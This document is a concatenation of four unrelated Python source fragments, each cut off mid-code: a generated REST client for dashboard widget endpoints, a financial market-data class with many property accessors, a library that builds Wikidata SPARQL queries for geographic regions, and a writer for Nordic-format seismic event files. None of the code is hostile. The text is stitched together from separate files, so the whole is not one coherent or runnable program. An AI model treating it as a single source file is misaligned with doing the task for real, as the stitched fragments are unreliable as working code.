returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_widget_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_widget_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_widget_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""get widget by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param str fields:
:return: Widget
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_widget_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_widget_by_id`") # noqa: E501
if 'id' in params and not re.search('\d+', params['id'] if type(params['id']) is str else str(params['id'])): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_widget_by_id`, must conform to the pattern `/\d+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['LMv1'] # noqa: E501
return self.api_client.call_api(
'/dashboard/widgets/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Widget', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_widget_data_by_id(self, id, **kwargs): # noqa: E501
"""get widget data # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_widget_data_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:param int start:
:param int end:
:param str format:
:return: WidgetData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_widget_data_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_widget_data_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_widget_data_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""get widget data # noqa: E501
# noqa: E501
This method makes | |
kwargs.get('lendingFundAcct')
self.__reportId = kwargs.get('reportId')
self.__indexWeight = kwargs.get('indexWeight')
self.__MACSPrimaryAssetClass = kwargs.get('MACSPrimaryAssetClass')
self.__rebate = kwargs.get('rebate')
self.__flagship = kwargs.get('flagship')
self.__trader = kwargs.get('trader')
self.__additionalPriceNotation = kwargs.get('additionalPriceNotation')
self.__factorCategory = kwargs.get('factorCategory')
self.__impliedVolatility = kwargs.get('impliedVolatility')
self.__spread = kwargs.get('spread')
self.__stsRatesMaturity = kwargs.get('stsRatesMaturity')
self.__equityDelta = kwargs.get('equityDelta')
self.__grossWeight = kwargs.get('grossWeight')
self.__listed = kwargs.get('listed')
self.__variance = kwargs.get('variance')
self.__tcmCostHorizon6Hour = kwargs.get('tcmCostHorizon6Hour')
self.__g10Currency = kwargs.get('g10Currency')
self.__shockStyle = kwargs.get('shockStyle')
self.__relativePeriod = kwargs.get('relativePeriod')
self.__isin = kwargs.get('isin')
self.__methodology = kwargs.get('methodology')
@property
def queueClockTimeLabel(self):
"""Label of the Stock's Queue Clock Time on the particular date."""
return self.__queueClockTimeLabel
@queueClockTimeLabel.setter
def queueClockTimeLabel(self, value):
self.__queueClockTimeLabel = value
self._property_changed('queueClockTimeLabel')
@property
def marketPnl(self) -> float:
"""Market Profit and Loss (PNL)."""
return self.__marketPnl
@marketPnl.setter
def marketPnl(self, value: float):
self.__marketPnl = value
self._property_changed('marketPnl')
@property
def year(self) -> str:
"""Year of forecast."""
return self.__year
@year.setter
def year(self, value: str):
self.__year = value
self._property_changed('year')
@property
def sustainAsiaExJapan(self) -> bool:
"""True if the stock is on the SUSTAIN Asia Ex Japan list as of the corresponding date. False if the stock is removed from the SUSTAIN Asia Ex Japan list on the corresponding date."""
return self.__sustainAsiaExJapan
@sustainAsiaExJapan.setter
def sustainAsiaExJapan(self, value: bool):
self.__sustainAsiaExJapan = value
self._property_changed('sustainAsiaExJapan')
@property
def investmentRate(self) -> float:
"""The rate of return on an investment. In the context of securities lending, it is the rate being earned on the reinvested collateral received from the borrower."""
return self.__investmentRate
@investmentRate.setter
def investmentRate(self, value: float):
self.__investmentRate = value
self._property_changed('investmentRate')
@property
def assetClassificationsGicsSubIndustry(self) -> str:
"""GICS Sub Industry classification (level 4)."""
return self.__assetClassificationsGicsSubIndustry
@assetClassificationsGicsSubIndustry.setter
def assetClassificationsGicsSubIndustry(self, value: str):
self.__assetClassificationsGicsSubIndustry = value
self._property_changed('assetClassificationsGicsSubIndustry')
@property
def mdapiClass(self) -> str:
"""MDAPI Asset Class."""
return self.__mdapiClass
@mdapiClass.setter
def mdapiClass(self, value: str):
self.__mdapiClass = value
self._property_changed('mdapiClass')
@property
def bidUnadjusted(self) -> float:
"""Unadjusted bid level of an asset based on official exchange fixing or calculation agent marked level."""
return self.__bidUnadjusted
@bidUnadjusted.setter
def bidUnadjusted(self, value: float):
self.__bidUnadjusted = value
self._property_changed('bidUnadjusted')
@property
def economicTermsHash(self) -> str:
"""Hash code for an asset."""
return self.__economicTermsHash
@economicTermsHash.setter
def economicTermsHash(self, value: str):
self.__economicTermsHash = value
self._property_changed('economicTermsHash')
@property
def neighbourAssetId(self) -> str:
"""Marquee identifier for the corresponding neighbour."""
return self.__neighbourAssetId
@neighbourAssetId.setter
def neighbourAssetId(self, value: str):
self.__neighbourAssetId = value
self._property_changed('neighbourAssetId')
@property
def simonIntlAssetTags(self) -> Tuple[str, ...]:
"""SIMON International Asset Tags."""
return self.__simonIntlAssetTags
@simonIntlAssetTags.setter
def simonIntlAssetTags(self, value: Tuple[str, ...]):
self.__simonIntlAssetTags = value
self._property_changed('simonIntlAssetTags')
@property
def path(self) -> str:
"""Path to value."""
return self.__path
@path.setter
def path(self, value: str):
self.__path = value
self._property_changed('path')
@property
def availableInventory(self) -> float:
"""An estimated indication of the share quantity potentially available to borrow in the relevant asset."""
return self.__availableInventory
@availableInventory.setter
def availableInventory(self, value: float):
self.__availableInventory = value
self._property_changed('availableInventory')
@property
def clientContact(self) -> str:
"""Name of client(s) requesting data."""
return self.__clientContact
@clientContact.setter
def clientContact(self, value: str):
self.__clientContact = value
self._property_changed('clientContact')
@property
def est1DayCompletePct(self) -> float:
"""Estimated 1 day completion percentage."""
return self.__est1DayCompletePct
@est1DayCompletePct.setter
def est1DayCompletePct(self, value: float):
self.__est1DayCompletePct = value
self._property_changed('est1DayCompletePct')
@property
def rank(self) -> float:
"""Rank to determine most relevant asset."""
return self.__rank
@rank.setter
def rank(self, value: float):
self.__rank = value
self._property_changed('rank')
@property
def mixedSwapOtherReportedSDR(self) -> str:
"""Indicates the other SDR to which a mixed swap is reported."""
return self.__mixedSwapOtherReportedSDR
@mixedSwapOtherReportedSDR.setter
def mixedSwapOtherReportedSDR(self, value: str):
self.__mixedSwapOtherReportedSDR = value
self._property_changed('mixedSwapOtherReportedSDR')
@property
def dataSetCategory(self) -> str:
"""Top level grouping of dataset."""
return self.__dataSetCategory
@dataSetCategory.setter
def dataSetCategory(self, value: str):
self.__dataSetCategory = value
self._property_changed('dataSetCategory')
@property
def createdById(self) -> str:
"""Unique identifier of user who created the object"""
return self.__createdById
@createdById.setter
def createdById(self, value: str):
self.__createdById = value
self._property_changed('createdById')
@property
def vehicleType(self) -> str:
"""Type of investment vehicle. Only viewable after having been granted additional access to asset information."""
return self.__vehicleType
@vehicleType.setter
def vehicleType(self, value: str):
self.__vehicleType = value
self._property_changed('vehicleType')
@property
def dailyRisk(self) -> float:
"""Daily Risk Value."""
return self.__dailyRisk
@dailyRisk.setter
def dailyRisk(self, value: float):
self.__dailyRisk = value
self._property_changed('dailyRisk')
@property
def bosInBpsLabel(self):
"""Label of the Stock's Bid-Offer Spread in Basis points on the particular date."""
return self.__bosInBpsLabel
@bosInBpsLabel.setter
def bosInBpsLabel(self, value):
self.__bosInBpsLabel = value
self._property_changed('bosInBpsLabel')
@property
def energy(self) -> float:
"""Energy price component."""
return self.__energy
@energy.setter
def energy(self, value: float):
self.__energy = value
self._property_changed('energy')
@property
def marketDataType(self) -> str:
"""The market data type (e.g. IR_BASIS, FX_Vol). This can be resolved into a dataset when combined with vendor and intraday=true/false."""
return self.__marketDataType
@marketDataType.setter
def marketDataType(self, value: str):
self.__marketDataType = value
self._property_changed('marketDataType')
@property
def sentimentScore(self) -> float:
"""A value representing a sentiment indicator."""
return self.__sentimentScore
@sentimentScore.setter
def sentimentScore(self, value: float):
self.__sentimentScore = value
self._property_changed('sentimentScore')
@property
def bosInBps(self) -> float:
"""The Bid-Offer Spread of the stock in Basis points on the particular date."""
return self.__bosInBps
@bosInBps.setter
def bosInBps(self, value: float):
self.__bosInBps = value
self._property_changed('bosInBps')
@property
def pointClass(self) -> str:
"""MDAPI Class."""
return self.__pointClass
@pointClass.setter
def pointClass(self, value: str):
self.__pointClass = value
self._property_changed('pointClass')
@property
def fxSpot(self) -> float:
"""FX spot rate as determined by fixing source."""
return self.__fxSpot
@fxSpot.setter
def fxSpot(self, value: float):
self.__fxSpot = value
self._property_changed('fxSpot')
@property
def bidLow(self) -> float:
"""Lowest Bid Price (price willing to buy)."""
return self.__bidLow
@bidLow.setter
def bidLow(self, value: float):
self.__bidLow = value
self._property_changed('bidLow')
@property
def valuePrevious(self) -> str:
"""Value for the previous period after the revision (if revision is applicable)."""
return self.__valuePrevious
@valuePrevious.setter
def valuePrevious(self, value: str):
self.__valuePrevious = value
self._property_changed('valuePrevious')
@property
def fairVarianceVolatility(self) -> float:
"""The strike in volatility terms, calculated as square root of fair variance."""
return self.__fairVarianceVolatility
@fairVarianceVolatility.setter
def fairVarianceVolatility(self, value: float):
self.__fairVarianceVolatility = value
self._property_changed('fairVarianceVolatility')
@property
def avgTradeRate(self) -> float:
"""The Average Trading Rate of the stock on the particular date."""
return self.__avgTradeRate
@avgTradeRate.setter
def avgTradeRate(self, value: float):
self.__avgTradeRate = value
self._property_changed('avgTradeRate')
@property
def shortLevel(self) -> float:
"""Level of the 5-day normalized flow for short selling/covering."""
return self.__shortLevel
@shortLevel.setter
def shortLevel(self, value: float):
self.__shortLevel = value
self._property_changed('shortLevel')
@property
def hedgeVolatility(self) -> float:
"""Standard deviation of the annualized returns."""
return self.__hedgeVolatility
@hedgeVolatility.setter
def hedgeVolatility(self, value: float):
self.__hedgeVolatility = value
self._property_changed('hedgeVolatility')
@property
def version(self) -> float:
"""Version number."""
return self.__version
@version.setter
def version(self, value: float):
self.__version = value
self._property_changed('version')
@property
def tags(self) -> Tuple[str, ...]:
"""Metadata associated with the object"""
return self.__tags
@tags.setter
def tags(self, value: Tuple[str, ...]):
self.__tags = value
self._property_changed('tags')
@property
def underlyingAssetId(self) -> str:
"""Marquee identifier for constituents of an index or portfolio."""
return self.__underlyingAssetId
@underlyingAssetId.setter
def underlyingAssetId(self, value: str):
self.__underlyingAssetId = value
self._property_changed('underlyingAssetId')
@property
def clientExposure(self) -> float:
"""Exposure of client positions to the factor in percent of equity."""
return self.__clientExposure
@clientExposure.setter
def clientExposure(self, value: float):
self.__clientExposure = value
self._property_changed('clientExposure')
@property
def correlation(self) -> float:
"""Market implied correlation between two tenors."""
return self.__correlation
@correlation.setter
def correlation(self, value: float):
self.__correlation = value
self._property_changed('correlation')
@property
def exposure(self) -> float:
"""Exposure of a given asset or portfolio in the denominated currency of the asset or portfolio."""
return self.__exposure
@exposure.setter
def exposure(self, value: float):
self.__exposure = value
self._property_changed('exposure')
@property
def gsSustainSubSector(self) -> str:
"""GS SUSTAIN sector."""
return self.__gsSustainSubSector
@gsSustainSubSector.setter
def gsSustainSubSector(self, value: str):
self.__gsSustainSubSector = value
self._property_changed('gsSustainSubSector')
@property
def domain(self) -> str:
"""Domain that request came from."""
return self.__domain
@domain.setter
def domain(self, value: str):
self.__domain = value
self._property_changed('domain')
@property
def marketDataAsset(self) -> str:
"""The market data asset (e.g. USD, USD/EUR)."""
return self.__marketDataAsset
@marketDataAsset.setter
def marketDataAsset(self, value: str):
self.__marketDataAsset = value
self._property_changed('marketDataAsset')
@property
def forwardTenor(self) -> str:
"""Start of swap after option expiry."""
return self.__forwardTenor
@forwardTenor.setter
def forwardTenor(self, value: str):
self.__forwardTenor = value
self._property_changed('forwardTenor')
@property
def unadjustedHigh(self) -> float:
"""Unadjusted high level of an asset based on official exchange fixing or calculation agent marked level."""
return self.__unadjustedHigh
@unadjustedHigh.setter
def unadjustedHigh(self, value: float):
self.__unadjustedHigh = value
self._property_changed('unadjustedHigh')
@property
def sourceImportance(self) -> float:
"""Source importance."""
return self.__sourceImportance
@sourceImportance.setter
def sourceImportance(self, value: float):
self.__sourceImportance = value
self._property_changed('sourceImportance')
@property
def eid(self) -> str:
"""Goldman Sachs internal exchange identifier."""
return self.__eid
@eid.setter
def eid(self, value: str):
self.__eid = value
self._property_changed('eid')
@property
def jsn(self) -> str:
"""Japan security number | |
<gh_stars>1-10
# coding=utf-8
# Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Library to support Wikidata geographic queries from https://query.wikidata.org/sparql.'''
from typing import Dict, Tuple, Sequence, Text, Any, List
import sys
import pandas as pd
from shapely.geometry.point import Point
from SPARQLWrapper import SPARQLWrapper, JSON
from cabby.geo import util
from cabby.geo.regions import Region
def create_info_query_from_region(region: Region) -> str:
return create_info_query(region.corner_sw, region.corner_ne)
def create_info_query(corner_west: Point, corner_east: Point) -> str:
return """
SELECT ?place ?placeLabel
?placeDescription ?architecturalStyleLabel ?subsidiaryLabel
?useLabel ?hasPartLabel
( GROUP_CONCAT ( DISTINCT ?altLabel; separator="; " ) AS ?altLabelList )
( GROUP_CONCAT ( DISTINCT ?instanceLabel; separator="; " ) AS ?instance )
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
{
?place wdt:P31 ?instance.
?wikipediaUrl schema:about ?place.
OPTIONAL {?place wdt:P527 ?hasPart}.
OPTIONAL {?place wdt:P366 ?use}.
OPTIONAL {?place wdt:P355 ?subsidiary}.
OPTIONAL {?place wdt:P149 ?architecturalStyle}.
OPTIONAL { ?place skos:altLabel ?altLabel . FILTER (lang(?altLabel) = "en") }
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
}
FILTER (?instance not in
(wd:Q34442,wd:Q12042110,wd:Q124757,wd:Q79007,wd:Q18340514,wd:Q537127,wd:Q1311958,wd:Q124757,
wd:Q25917154, wd:Q1243306, wd:Q1570262, wd:Q811683,
wd:Q744913, wd:Q186117, wd:Q3298291) )
}
GROUP BY ?place ?placeLabel ?wikipediaUrl ?placeDescription ?architecturalStyleLabel ?subsidiaryLabel ?useLabel ?hasPartLabel
"""
def create_query_from_region(region: Region) -> str:
return create_query(region.corner_sw, region.corner_ne)
def create_query(corner_west: Point, corner_east: Point) -> str:
return """
SELECT ?place ?placeLabel ?wikipediaUrl
( GROUP_CONCAT ( DISTINCT ?instanceLabel; separator="; " ) AS ?instance )
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
{
?place wdt:P31 ?instance.
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
FILTER (?instance not in
(wd:Q34442,wd:Q12042110,wd:Q124757,wd:Q79007,wd:Q18340514,wd:Q537127,wd:Q1311958,wd:Q124757,
wd:Q25917154, wd:Q1243306, wd:Q1570262, wd:Q811683,
wd:Q744913, wd:Q186117, wd:Q3298291) )
}
UNION
{
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
}
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
}
GROUP BY ?place ?placeLabel ?wikipediaUrl
"""
def create_relation_query_from_region(region: Region) -> str:
return create_relation_query(region.corner_sw, region.corner_ne)
def create_relation_query(corner_west: Point, corner_east: Point) -> str:
return """
SELECT ?place ?placeLabel ?p ?propLabel ?instance ?instanceLabel
WHERE
{
{
?place ?p ?instance.
FILTER (?p IN (wdt:P31,
wdt:P5353,
wdt:P2012,
wdt:P361,
wdt:P149,
wdt:P84,
wdt:P138,
wdt:P112,
wdt:P1435,
wdt:P1640,
wdt:P463,
wdt:P355,
wdt:P527,
wdt:P140) )
%s
# SERVICE wikibase:label { bd:serviceParam wikibase:language "en". }
?prop wikibase:directClaim ?p .
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
}
FILTER (?instance not in
(wd:Q34442,wd:Q12042110,wd:Q124757,wd:Q79007,wd:Q18340514,wd:Q537127,wd:Q1311958,wd:Q124757,
wd:Q25917154, wd:Q1243306, wd:Q1570262, wd:Q811683,
wd:Q744913, wd:Q186117, wd:Q3298291) )
}
"""
_BY_QID_QUERY_LOCATION_ONLY = """SELECT ?place
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
VALUES ?place {wd:%s}
?place wdt:P625 ?location .
?wikipediaUrl schema:about ?place.
}
GROUP BY ?place
"""
_BY_QID_QUERY = """SELECT ?place ?placeLabel ?wikipediaUrl
( GROUP_CONCAT ( DISTINCT ?instanceLabel; separator="; " ) AS ?instance )
(GROUP_CONCAT(DISTINCT?location;separator=", ") AS ?point)
WHERE
{
{
VALUES ?place {wd:%s}
?place wdt:P31 ?instance.
?place wdt:P625 ?location .
?wikipediaUrl schema:about ?place.
?wikipediaUrl schema:isPartOf <https://en.wikipedia.org/>.
SERVICE wikibase:label { bd:serviceParam wikibase:language "[AUTO_LANGUAGE],en". }
?instance rdfs:label ?instanceLabel. filter(lang(?instanceLabel) = "en").
}
}
GROUP BY ?place ?placeLabel ?wikipediaUrl
"""
def create_location_query_from_region(region: Region) -> str:
return create_location_query(region.corner_sw, region.corner_ne)
def create_location_query(corner_west: Point, corner_east: Point) -> str:
return """
SELECT ?place ?location
WHERE
{
{
SERVICE wikibase:box {
?place wdt:P625 ?location .
""" + f"""
bd:serviceParam wikibase:cornerWest "Point({corner_west.x},{corner_west.y})"^^geo:wktLiteral .
bd:serviceParam wikibase:cornerEast "Point({corner_east.x},{corner_east.y})"^^geo:wktLiteral .
""" + """
}
%s
}
}
"""
def get_geofenced_info_wikidata_items(region: Region) -> List[Dict[Text, Any]]:
'''Get Wikidata items with extensive intformation for a specific area.
Arguments:
region(Region): The area to query the Wikidata items.
Returns:
The Wikidata items with extensive information found in the area.
'''
results = query_api(create_info_query_from_region(region))
# Filter by map region.
filtered_results = []
for result in results:
point_str = result['point']['value']
point = util.point_str_to_shapely_point(point_str)
if region.polygon.contains(point):
filtered_results.append(result)
return filtered_results
def get_geofenced_wikidata_items(region: Region) -> Sequence[Dict[Text, Any]]:
'''Get Wikidata items for a specific area.
Arguments:
region(Region): The area to query the Wikidata items.
Returns:
The Wikidata items found in the area.
'''
results = query_api(create_query_from_region(region))
# Filter by map region.
filtered_results = []
for result in results:
point_str = result['point']['value']
point = util.point_str_to_shapely_point(point_str)
if region.polygon.contains(point):
filtered_results.append(result)
return filtered_results
def get_filter_string(place_filter: Sequence[Text],
place_param: Text = "place"):
"""Get an appropriate FILTER sparql command for the input sequence.
Arguments:
place_filter: list of wd IDs as strings.
place_param: the name of the parameter to filter on.
Returns:
filter_string: a string like "FILTER (?place IN ...)". Returns empty string
if the input list is empty.
"""
if len(place_filter) == 0:
return ""
filter_string = "FILTER (?%s IN (%s))" % (
place_param,
",".join(["wd:%s" % qid for qid in place_filter]))
return filter_string
def get_locations_by_qid(region: Region,
place_filter: Sequence[Text] = []) -> Dict[Text, Any]:
"""Get a map from QID to coordinate location in a particular region.
Arguments:
region(Text): region to query.
place_filter: a list of QIDs (e.g. ["Q123", "Q987"]) to filter the places.
If left empty, no place filtering will happen.
Returns:
locations: map from QID (string) to shapely Point
"""
query_result = query_api(create_location_query_from_region(region)
% get_filter_string(place_filter))
locations = {}
for result in query_result:
qid = result['place']['value'].rsplit("/", 1)[1]
point = util.point_str_to_shapely_point(result['location']['value'])
locations[qid] = point
return locations
def get_geofenced_wikidata_relations(region: Region,
place_filter: Sequence[Text] = [],
extract_qids = False) -> pd.DataFrame:
'''Get Wikidata relations for a specific area.
Arguments:
region(Region): The area to query the Wikidata items.
place_filter: a list of QIDs (e.g. ["Q123", "Q987"]) to filter the places.
If left empty, no place filtering will happen.
extract_qids: If true, the columns place, p, and instance will hold just the
QIDs/PIDs found in the last part of the wikidata URI.
Returns:
The Wikidata items, and certain relations to other Wikidata items. Columns:
place: wikidata item corresponding to place within the region
p: wikidata property extracted from the place
instance: value of the property p
instanceLabel: human-readable version of instance
placeLabel: human-readable version of place
propLabel: human-readable version of p
'''
query_result = query_api(create_relation_query_from_region(region)
% get_filter_string(place_filter))
result_df = pd.DataFrame([{k: v['value'] for k, v in x.items()} for x in query_result])
if extract_qids:
extract_qid = lambda s: s.apply(lambda x: x.rsplit("/", 1)[1])
extract_cols = ["place", "p", "instance"]
result_df[extract_cols] = result_df[extract_cols].apply(extract_qid)
return result_df
def get_place_location_points_from_qid(
qid: Text, location_only: bool = False) -> Sequence[Dict[Text, Any]]:
'''Get lat/long point for a particular QID.
Arguments:
qid(Text): The qid to return point of.
location_only: if True, the return list will only include two dicts: one for QID ('place')
and one for the string version of a Point ('point'). Note that if False, this may return
null results for certain places that have non-English place/instance labels.
Returns:
list of SPARQLWrapper return dicts giving wikidata fields and values.
'''
if location_only:
query = _BY_QID_QUERY_LOCATION_ONLY % qid
else:
query = _BY_QID_QUERY % qid
return query_api(query)
def query_api(query: Text) -> Sequence[Dict[Text, Any]]:
'''Query the Wikidata API.
Arguments:
queries(Text): The list of queries to run on the Wikidata API.
Returns:
The Wikidata items found as a Dictionary of:
(1) head lables - {'vars': ['place', 'placeLabel', 'wikipediaUrl', 'point']}
(2) results- e.g., {'place': {'type': 'uri', 'value':
'http://www.wikidata....y/Q3272426'}, 'placeLabel': {'type': 'literal',
'value': 'Equitable Life Building', 'xml:lang': 'en'}, 'point': {'type':
'literal', 'value': 'Point(-74.010555555 ...708333333)'}, 'wikipediaUrl':
{'type': 'uri', 'value': 'https://en.wikipedia...Manhattan)'}}
'''
endpoint_url = "https://query.wikidata.org/sparql"
user_agent = "WDQS-example Python/%s.%s" % (
sys.version_info[0], sys.version_info[1])
sparql = SPARQLWrapper(endpoint_url, agent=user_agent)
| |
in the same
way as the events in the catalog.
"""
if not wavefiles:
wavefiles = ['DUMMY' for _i in range(len(catalog))]
with open(filename, 'w') as fout:
for event, wavfile in zip(catalog, wavefiles):
select = io.StringIO()
_write_nordic(event=event, filename=None, userid=userid,
evtype=evtype, wavefiles=wavfile,
string_io=select)
select.seek(0)
for line in select:
fout.write(line)
fout.write('\n')
def _write_nordic(event, filename, userid='OBSP', evtype='L', outdir='.',
wavefiles='DUMMY', explosion=False,
overwrite=True, string_io=None):
"""
Write an :class:`~obspy.core.event.Event` to a nordic formatted s-file.
:type event: :class:`~obspy.core.event.event.Event`
:param event: A single obspy event
:type filename: str
:param filename:
Filename to write to, can be None, and filename will be generated from
the origin time in nordic format.
:type userid: str
:param userid: Up to 4 character user ID
:type evtype: str
:param evtype:
Single character string to describe the event, either L, R or D.
:type outdir: str
:param outdir: Path to directory to write to
:type wavefiles: list
:param wavefiles: Waveforms to associate the nordic file with
:type explosion: bool
:param explosion:
Note if the event is an explosion, will be marked by an E.
:type overwrite: bool
:param overwrite: force to overwrite old files, defaults to False
:type string_io: io.StringIO
:param string_io:
If given, will write to the StringIO object in memory rather than to
the filename.
:returns: str: name of nordic file written
.. note::
Seisan can find waveforms either by their relative or absolute path, or
by looking for the file recursively in directories within the WAV
directory in your seisan install. Because all lines need to be less
than 79 characters long (fortran hangover) in the s-files, you will
need to determine whether the full-path is okay or not.
"""
# First we need to work out what to call the s-file and open it
# Check that user ID is the correct length
if len(userid) != 4:
raise NordicParsingError('%s User ID must be 4 characters long'
% userid)
# Check that outdir exists
if not os.path.isdir(outdir):
raise NordicParsingError('Out path does not exist, I will not '
'create this: ' + outdir)
# Check that evtype is one of L,R,D
if evtype not in ['L', 'R', 'D']:
raise NordicParsingError('Event type must be either L, R or D')
if explosion:
evtype += 'E'
# Check that there is one event
if isinstance(event, Catalog) and len(event) == 1:
event = event[0]
elif isinstance(event, Event):
event = event
else:
raise NordicParsingError('Needs a single event')
if not isinstance(wavefiles, list):
wavefiles = [str(wavefiles)]
# Determine name from origin time
try:
evtime = event.origins[0].time
except IndexError:
msg = ('Need at least one origin with at least an origin time')
raise NordicParsingError(msg)
if not evtime:
msg = ('event has an origin, but time is not populated. ' +
'This is required!')
raise NordicParsingError(msg)
# Attempt to cope with possible pre-existing files
if not filename:
range_list = []
for i in range(30): # Look +/- 30 seconds around origin time
range_list.append(i)
range_list.append(-1 * i)
range_list = range_list[1:]
for add_secs in range_list:
sfilename = (evtime + add_secs).datetime.strftime('%d-%H%M-%S') +\
evtype[0] + '.S' + (evtime + add_secs).\
datetime.strftime('%Y%m')
if not os.path.isfile(os.path.join(outdir, sfilename)):
sfile_path = os.path.join(outdir, sfilename)
break
elif overwrite:
sfile_path = os.path.join(outdir, sfilename)
break
else:
raise NordicParsingError(os.path.join(outdir, sfilename) +
' already exists, will not overwrite')
else:
sfile_path = os.path.join(outdir, filename)
sfilename = filename
# Write the header info.
if event.origins[0].latitude is not None:
lat = '{0:.3f}'.format(event.origins[0].latitude)
else:
lat = ''
if event.origins[0].longitude is not None:
lon = '{0:.3f}'.format(event.origins[0].longitude)
else:
lon = ''
if event.origins[0].depth is not None:
depth = '{0:.1f}'.format(event.origins[0].depth / 1000)
else:
depth = ''
if event.creation_info:
try:
agency = event.creation_info.get('agency_id')
# If there is creation_info this may not raise an error annoyingly
if agency is None:
agency = ''
except AttributeError:
agency = ''
else:
agency = ''
if len(agency) > 3:
agency = agency[0:3]
# Cope with differences in event uncertainty naming
if event.origins[0].quality and event.origins[0].quality['standard_error']:
timerms = '{0:.1f}'.format(event.origins[0].quality['standard_error'])
else:
timerms = '0.0'
conv_mags = []
for mag_ind in range(3):
mag_info = {}
try:
mag_info['mag'] = '{0:.1f}'.format(
event.magnitudes[mag_ind].mag) or ''
mag_info['type'] = _evmagtonor(event.magnitudes[mag_ind].
magnitude_type) or ''
if event.magnitudes[0].creation_info:
mag_info['agency'] = event.magnitudes[mag_ind].\
creation_info.agency_id or ''
else:
mag_info['agency'] = ''
except IndexError:
mag_info['mag'] = ''
mag_info['type'] = ''
mag_info['agency'] = ''
conv_mags.append(mag_info)
# Work out how many stations were used
if len(event.picks) > 0:
stations = [pick.waveform_id.station_code for pick in event.picks]
ksta = str(len(set(stations)))
else:
ksta = ''
if not string_io:
sfile = open(sfile_path, 'w')
else:
sfile = string_io
sfile.write(' ' + str(evtime.year) + ' ' +
str(evtime.month).rjust(2) +
str(evtime.day).rjust(2) + ' ' +
str(evtime.hour).rjust(2) +
str(evtime.minute).rjust(2) + ' ' +
str(evtime.second).rjust(2) + '.' +
str(evtime.microsecond).ljust(1)[0:1] + ' ' +
evtype.ljust(2) + lat.rjust(7) + lon.rjust(8) +
